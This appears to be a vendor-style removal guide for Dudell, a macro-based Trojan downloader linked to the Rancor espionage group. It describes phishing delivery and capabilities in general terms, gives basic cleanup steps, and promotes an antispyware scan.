Dudell Removal Guide

Do you know what Dudell is?

Dudell is a Trojan infection component that is associated with the Rancor espionage group. This group carries out targeted attacks against government organizations and other institutions in South East Asia. Most of the time, the attacks employ several Trojan components, and each component is responsible for a certain step in the attack. Thus, if you set out to remove Dudell, you have to remember that there are many more malicious components on your system, and you must terminate them all, too. The best way to achieve that is to employ a powerful antispyware tool.

Most of the malware families employed by this espionage group have been documented by security researchers in 2017 and 2018. Dudell happens to be a new custom malware family that is used to download the main payload onto the target system. Also, it is believed that Dudell is used along with Derusbi (another malware family). Derusbi is associated with Chinese cyber espionage groups, so it wouldn’t be surprising if Dudell would also be used by the same crooks to steal sensitive information from South East Asian government organizations.

As far as the appearance is concerned, Dudell actually looks like a Microsoft Excel document file. Therefore, if the potential targets often have to deal with such types of documents, they might not consider it suspicious when it lands in your inboxes. Yes, that’s right – this infection spreads through phishing attacks. It also means that the victims open those emails and launch these dangerous files themselves.

Now let us remind you that Dudell and the attack groups that use it mostly target government organizations. It means that the government employees have to be educated about the potential cybersecurity threats and how to avoid them. In fact, it is important to employ legitimate security programs that would help your organization protect your system and your data from malicious hacks. Hence, all the received files should be scanned first before anyone opens them. If this simple step was implemented swiftly, Dudell and other similar infections would not be able to enter the target systems that easy.

But what happens when users download and open the Dudell file? As mentioned, the file is an MS Excel document, and one of the file names that it uses is “Equipment Purchase List 2018-2020 (Final).xls.” The name doesn’t look suspicious at all. Not to mention that it also doesn’t have any spelling errors, which is quite common with spam emails and the attachments that come along.

So, this document comes with a malicious macro. Not all computers have macros enabled, so when users try to open the Dudell document, they will see a prompt that urges them to enable macros. Then they click “Enable Content,” the malicious macro runs on the victim’s machine. The script that gets launched eventually downloads a second stage payload through the Microsoft tool msiexec. From there, several other malware components take over.

There are several plug-ins that are used by this infection. Therefore, the overall capabilities of the infection may differ depending on the plug-in that is used, and what the criminals want it to do. For example, one of the plug-ins can easily take screenshots, execute commands, enumerate storage volumes, list folder contents, delete files, upload files, and so on. The point is that the malicious attack that employs Dudell can be extremely intrusive, and it might remain active on the affected system for a while before the victims notice that their system has been compromised. That is why regular system scans with a legitimate security program are vital.

The ironic part is that it is not hard to remove Dudell at all. You just need to delete the file you downloaded. However, let’s not forget that this file is just a spearhead of the entire infection, and unless you are an experienced computer user, it wouldn’t be possible to remove all the malware components manually. Hence, it is strongly recommended that you invest in a powerful security application that will detect and terminate all the dangerous files. Also, be sure to report potential cybersecurity problems to your IT department because it is also up to them to help you fight such intruders.

How to Remove Dudell

  1. Remove suspicious files from Desktop.
  2. Navigate to the Downloads folder.
  3. Delete suspicious files from the folder.
  4. Press Win+R and enter %TEMP%. Press OK.
  5. Delete recent files from the directory.
  6. Run a full system scan with SpyHunter.

In non-techie terms:

Dudell is just one puzzle piece in a huge picture of malicious attacks against organizations in South East Asia. It is a Trojan infection, but it works as a tool that downloads another payload onto the victim’s system. Therefore, when you get down to removing this malicious file, you have to terminate all the dangerous components together. The best way to deal with this intruder is to employ a powerful antispyware tool to get rid of it.